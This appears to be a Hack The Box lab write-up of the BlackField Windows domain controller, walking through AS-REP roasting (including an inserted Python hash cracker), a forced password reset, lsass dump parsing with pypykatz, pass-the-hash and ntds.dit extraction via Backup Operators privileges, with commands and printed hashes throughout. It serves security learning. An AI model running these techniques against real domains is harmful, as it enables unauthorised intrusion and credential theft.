HTB - BlackField

Machine Info
Blackfield is a hard difficulty Windows machine featuring Windows and Active Directory misconfigurations. Anonymous / Guest access to an SMB share is used to enumerate users. One user is found to have Kerberos pre-authentication disabled, which allows us to conduct an ASREPRoasting attack. This allows us to retrieve a hash of the encrypted material contained in the AS-REP, which can be subjected to an offline brute force attack in order to recover the plaintext password. With this user we can access an SMB share containing forensics artefacts, including an lsass process dump. This contains a username and a password for a user with WinRM privileges, who is also a member of the Backup Operators group. The privileges conferred by this privileged group are used to dump the Active Directory database and retrieve the hash of the primary domain administrator.
Enumeration
Scope
IP Address: 10.10.10.192
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,88,135,389,445,593,3268,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-12 23:31:40Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h00m02s
| smb2-time:
| date: 2024-07-12T23:31:51
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
* Open ports: 53,88,135,389,445,593,3268,5985
* Services: DNS - KERBEROS - RPC - SMB - winRM
* Important Notes: Domain: BLACKFIELD.local, host DC01 (DNS, Kerberos, LDAP and Global Catalog on one box: this is a domain controller)
* SMB signing is enabled and required, so NTLM relay to SMB on this host is not an option
* Clock skew is about 7 hours. Anything that presents a Kerberos authenticator (ticket requests with pre-auth, Kerberos logons) can fail with KRB_AP_ERR_SKEW until the clock is synced to the DC (ntpdate or faketime); the unauthenticated AS-REQ used for AS-REP roasting and NTLM-based logons are not affected
RPC Enumeration

SMB Enumeration
When I connected to the SMB server with a null (anonymous) session, it failed:

However, when I authenticated as the guest account, I got a hit:

smbclient shows the same result:

I mounted the share on my Kali machine to explore it more easily:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\profiles$" ./mount
Password for root@\\10.10.10.192\profiles$:

The folder names look like user profile directories, so I will save them to a list and test them against Kerberos to find valid usernames (the KDC answers an AS-REQ differently for an unknown principal and for an existing one, so no password is needed for this check):
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount | tee -a users.txt
<snip>
Kerberos Enumeration
kerbrute found three valid users.

Running an AS-REP roasting attack against them returned a hash for the user support, which means that account has Kerberos pre-authentication disabled:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-GetNPUsers BLACKFIELD.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.txt
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275ceb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt
$krb5asrep$23$support@BLACKFIELD.LOCAL:30c1b9d2109600c3ebb0e38fb20ab14d$4473af423266d56382e57fc031bae65483b913e45c4a0efcf25fb62008518a2a385360f1d5a5bdd1cec5adb730154b1108bf3739f84ea86e3d4d62fe0ba6d1bcf74e09831c8d5ecc2aa0135f848d34a3e6e961a6faecb4b74298262263c9184ffc5aa4b9ae0f81330e08915a1892ebc53551bd39e1040a6218f0cd4e580483fb3c584b60dda863a39134a4cfa4eb573c5dfabebcc54120404f33169419086a3ae31382ebd3b05c29e3e525459991fcfc9a65d4cc764b6e7a714a0a39616f794884dd1eee275ceb091ce8bc4f2a1de7a0cdeb43b418d03a706dd3b3a9d3d70353fc94e9084892e3a038c711c395430c1dcf3277b9:#00^BlackKnight
Session..........: hashcat
Status...........: Cracked
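To make clear what hashcat is actually doing with that `$krb5asrep$23$` line, here is the offline verification step re-implemented in pure Python. This is an added example for this writeup, not impacket, hashcat or the author's code. It follows the RFC 4757 RC4-HMAC construction used by etype 23: the user's long-term key is the NT hash (MD4 over the UTF-16LE password), K1 is HMAC-MD5 of the key over the little-endian key usage (8 for the AS-REP encrypted part, since RFC 4757 maps RFC 4120 usage 3 to 8), the checksum is HMAC-MD5(K1, confounder || plaintext), and the data is RC4-encrypted under K3 = HMAC-MD5(K1, checksum). GetNPUsers prints the first 16 bytes of the cipher as the checksum and the rest as the data, so each guess is checked by rebuilding K1/K3, decrypting and recomputing the checksum, with no further contact with the KDC. The test vector in `__main__` is constructed locally (a stand-in plaintext encrypted under a known password); the `support` hash printed above can be passed to `crack_asrep` unchanged. MD4 is implemented inline because hashlib's md4 is frequently disabled on OpenSSL 3.

```python
"""Offline AS-REP roasting (the check behind hashcat -m 18200) in pure Python.
Added example for this writeup; not impacket/hashcat code and not the author's.
  K  = NT hash = MD4(UTF-16LE(password))
  K1 = HMAC-MD5(K, LE32(usage))            usage 8 = AS-REP enc-part (RFC 4757)
  cksum = HMAC-MD5(K1, confounder || plaintext)
  cipher = cksum || RC4(HMAC-MD5(K1, cksum), confounder || plaintext)
"""
import hashlib, hmac, os, struct

AS_REP_USAGE = 8
MASK = 0xFFFFFFFF


def _md4(data: bytes) -> bytes:
    """RFC 1320 MD4 (hashlib's md4 is often unavailable under OpenSSL 3)."""
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: each step updates one word, then the roles rotate
            a, b, c, d = d, rotl((a + f(b, c, d) + x[i]) & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: column-wise message schedule
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + g(b, c, d) + x[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rotl((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 over the UTF-16LE password; this is the RC4-HMAC long-term key."""
    return _md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key-scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation XORed with data
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, usage: int = AS_REP_USAGE, confounder: bytes = None) -> bytes:
    """What the KDC does with the client's key; used here only to build a test vector."""
    data = (confounder or os.urandom(8)) + plaintext
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    cksum = _hmac_md5(k1, data)
    return cksum + rc4(_hmac_md5(k1, cksum), data)


def rc4_hmac_decrypt(key: bytes, blob: bytes, usage: int = AS_REP_USAGE):
    """Return the plaintext (confounder stripped) or None when the checksum does not verify."""
    cksum, enc = blob[:16], blob[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, cksum), enc)
    return data[8:] if hmac.compare_digest(_hmac_md5(k1, data), cksum) else None


def parse_asrep_hash(line: str) -> dict:
    """Parse '$krb5asrep$23$user@REALM:checksum$edata' (a trailing ':password' from a potfile is ignored)."""
    head, body = line.strip().split(":")[:2]
    _, tag, etype, principal = head.split("$", 3)
    if tag != "krb5asrep":
        raise ValueError("not a krb5asrep hash")
    cksum_hex, edata_hex = body.split("$")
    return {"etype": int(etype), "principal": principal,
            "blob": bytes.fromhex(cksum_hex) + bytes.fromhex(edata_hex)}


def format_asrep_hash(principal: str, blob: bytes) -> str:
    return f"$krb5asrep$23${principal}:{blob[:16].hex()}${blob[16:].hex()}"


def crack_asrep(line: str, wordlist):
    """Return the first candidate whose NT hash verifies the AS-REP checksum, else None."""
    info = parse_asrep_hash(line)
    if info["etype"] != 23:
        raise ValueError("only RC4-HMAC (etype 23) is handled here")
    for pw in wordlist:
        if rc4_hmac_decrypt(nt_hash(pw), info["blob"]) is not None:
            return pw
    return None


if __name__ == "__main__":
    # Constructed vector: a stand-in EncASRepPart encrypted under a known password.
    blob = rc4_hmac_encrypt(nt_hash("#00^BlackKnight"), b"constructed EncASRepPart stand-in")
    line = format_asrep_hash("support@BLACKFIELD.LOCAL", blob)
    print(line)
    print("cracked:", crack_asrep(line, ["password", "Summer2020", "#00^BlackKnight"]))
```

The whole cost of a guess is one MD4, three HMAC-MD5s and one RC4 pass over the blob, which is why rockyou-sized wordlists fall in seconds on a GPU. The defence is correspondingly simple: no account should have `DONT_REQUIRE_PREAUTH` set, and the ones that legitimately must have it need long random passwords; AES-only accounts would at least change the etype, but the same offline check applies to etype 17/18 with a different KDF.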
Initial Access
Confirm the recovered credentials against SMB:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight'
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
List the shares that support has access to:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u support -p '#00^BlackKnight' --shares
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
I couldn't find any interesting files in the readable shares even with valid credentials, so I continued enumeration with bloodhound.py. Collect the domain with bloodhound-python and feed the resulting zip file to the BloodHound GUI:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ bloodhound-python -u 'support' -p '#00^BlackKnight' -ns $ip -d blackfield.local -c all
Looking at BloodHound, I found that support has ForceChangePassword over audit2020, i.e. it can reset that user's password:

I ran a custom Cypher query in BloodHound to see which users can PSRemote to the machine:
MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2

I searched for a way to change a user's password without having access to the machine and found this command in this post: https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword. Note that this resets audit2020's password: the real user is locked out and the reset is logged on the DC (event 4724), so on a real engagement record the change and coordinate it with the client.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ rpcclient -U "support%#00^BlackKnight" $ip
rpcclient $> setuserinfo
Usage: setuserinfo username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo audit2020 23 P@ssword123!
I managed to change the user's password, but audit2020 still has no access to the machine (no WinRM), so I went back to enumerating the shares with this user:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!'
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:P@ssword123!
audit2020 has read access on the forensic share:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u audit2020 -p 'P@ssword123!' --shares
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:P@ssword123!
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
I will mount the share on my Kali machine and start navigating it (the password goes in single quotes so the shell does not treat the ! as history expansion):
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ sudo mount -t cifs "\\\\$ip\\forensic" ./mount -o username=audit2020,password='P@ssword123!'
[sudo] password for kali:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ ls mount
commands_output memory_analysis tools
The commands_output and memory_analysis directories look interesting, and the most important file is lsass.zip, a zipped dump of the LSASS process.

Zip file content:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip -l lsass.zip
Archive: lsass.zip
Length Date Time Name
--------- ---------- ----- ----
143044222 2020-02-23 11:02 lsass.DMP
--------- -------
143044222 1 file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
I will extract secrets from this memory dump with pypykatz, a Python implementation of mimikatz that runs on Linux:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ pypykatz lsa minidump ./lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
<snip>
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
DPAPI: 240339f898b6ac4ce3f34702e4a8955
<snip>
I tried pass-the-hash with the NT hashes for svc_backup and Administrator. svc_backup's hash works; the Administrator hash from the dump does not (STATUS_LOGON_FAILURE), so it is stale:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ crackmapexec smb $ip -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE
We know from BloodHound that svc_backup can PSRemote to the machine, so I will start evil-winrm with pass-the-hash:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type ..\Desktop\user.txt
3920bb317a0bef51xxxxxxxxxxxxxxxx
User Flag: 3920bb317a0bef51xxxxxxxxxxxxxxxx
Privilege Escalation
svc_backup is a member of the privileged group Backup Operators, which holds SeBackupPrivilege and SeRestorePrivilege. SeBackupPrivilege allows reading any file on the DC regardless of its ACL, including the Active Directory database (ntds.dit), which is enough to recover the Domain Admin's hash.

ntds.dit is locked while the DC is running, so I will create a shadow copy of the C: volume with diskshadow.exe and read the database from the copy. Create a file (vss.dsh) containing the following commands for the diskshadow utility:
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit
I ran into an issue when running diskshadow, so I asked the community; the cause was the line endings of the script file. diskshadow /s expects Windows CRLF line endings, and a file written on Linux has LF only, so convert it before uploading:
unix2dos vss.dsh
Create a shadow copy
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s .\vss.dsh
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 7/12/2024 7:46:57 PM
-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
The shadow copy was successfully exposed as E:\.
-> end backup
-> exit
Copy the database file from the shadow copy to the current directory using the SeBackupPrivilege PowerShell cmdlets (uploaded to the box beforehand), which open the file in backup mode so the ACL on ntds.dit does not matter:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> import-module .\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit .\ntds.dit
Save the SYSTEM hive, which holds the boot key needed to decrypt the hashes in the database:
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save HKLM\SYSTEM SYSTEM.SAV
Dump the secrets from the database offline with secretsdump (LOCAL tells it to parse the files rather than contact a host):
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480bxxxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:a6504030ea199802f249588cdcabfab1:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c5f2d015f316018f6405522825689ffe:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/BlackField]
└─$ evil-winrm -i $ip -u administrator -H 184fb5e5178480bexxxxxxxxxxxx
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
4375a629c7c67c8e29dxxxxxxxxxxxx
Root Flag: 4375a629c7c67c8exxxxxxxxxxxx